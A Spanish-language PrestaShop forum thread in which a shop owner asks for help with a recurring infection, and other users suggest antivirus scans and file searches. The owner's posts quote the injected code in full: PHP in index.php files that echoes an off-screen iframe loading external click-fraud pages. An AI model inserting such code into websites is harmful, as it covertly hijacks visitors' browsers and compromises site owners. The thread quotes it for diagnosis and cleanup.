ericzon Posted October 16, 2013 Share Posted October 16, 2013 Hola a tod@s, Tengo un hosting donde hago pruebas, en el que hay instalado un ps 1.5.4, Cada dos días me encuentro que después de donde se cierra el body, hay insertado un iframe que apunta a publicidad externa. Os pongo un ejemplo: <style>body {overflow-x:hidden;overflow-y:auto;} </style> <iframe id="fop" name="fop" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://bali-stone.nl/clicker.php" > </iframe> Esto hace que la web que algo desconfigurada y al añadir un producto al carrito por ajax, pete de mala manera. He buscado en la base de datos y en los archivos y no parece nada que coincida con los nombres que se utilizan en ese trozo de código. Sabéis como puedo proteger mejor mi Prestashop de este tipo de ataques o como puedo limpiar lo que han conseguido introducir? Un saludo y gracias Link to comment Share on other sites More sharing options...
ondho Posted October 16, 2013 Share Posted October 16, 2013 Hola, Debes tener infectado los ficheros index, de forma que cada vez que lo sube te incorpora el iframe problemático. Tendrías que limpiar primero el virus del ordenador, puedes mirar aquí unas instrucciones. http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/trojanclickerhtmliframe ¿Tienes activado algún antivirus, algo estilo malware o adware te puede ser útil en este caso? También algo más básico como el AVG gratuito, para el dia a dia. Espero que lo puedas solucionar. Saludos Link to comment Share on other sites More sharing options...
Paula Martinez Posted October 16, 2013 Share Posted October 16, 2013 Hola a tod@s, Tengo un hosting donde hago pruebas, en el que hay instalado un ps 1.5.4, Cada dos días me encuentro que después de donde se cierra el body, hay insertado un iframe que apunta a publicidad externa. Os pongo un ejemplo: <style>body {overflow-x:hidden;overflow-y:auto;} </style> <iframe id="fop" name="fop" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://bali-stone.nl/clicker.php" > </iframe> Esto hace que la web que algo desconfigurada y al añadir un producto al carrito por ajax, pete de mala manera. He buscado en la base de datos y en los archivos y no parece nada que coincida con los nombres que se utilizan en ese trozo de código. Sabéis como puedo proteger mejor mi Prestashop de este tipo de ataques o como puedo limpiar lo que han conseguido introducir? Un saludo y gracias Hola, Me llamo Raul Martinez, Tienes programas que te permiten hacer una busqueda en todos los ficheros de tu tienda, sin necesidad de abrir los ficheros uno por uno. ¿Puedo ver tu web para ver si me salta el antivirus o algo asi? Link to comment Share on other sites More sharing options...
ericzon Posted October 17, 2013 Author Share Posted October 17, 2013 Tengo el pc con antivirus y he escaneado sin encontrar nada grave. Por el momento, he cambiado la contraseña del ftp, he dejado de usar el Filezilla, a cambio del WinSCP, he comprobado que los permisos de las carpetas y archivos estén ok y he podido ver que efectivamente, los archivos index.php de la raíz y del 1er nivel de carpetas que cuelgan de ella, tienen los index infectados por igual. // contenido habitual del index.php ... exit(); #44e890# if(empty($xwdkv)) { $xwdkv = "<style>body {overflow-x:hidden;overflow-y:auto;} </style> <iframe id=\"zsk\" name=\"zsk\" style=\"position:absolute; height: 100px; width:120px; left:5000px; top:120px;\" src=\"http://www.freedogimport.com/clik.php\" > </iframe> "; echo $xwdkv; } #/44e890# Lo curioso es que se ejecute estando después del exit. Por el momento lo he machacado con una copia de seguridad que tengo sin infectar, lo malo es que hasta que no tape la vía de entrada, esto volverá a pasar. Alguna posible solución? Muchas gracias a tod@s Link to comment Share on other sites More sharing options...
Recommended Posts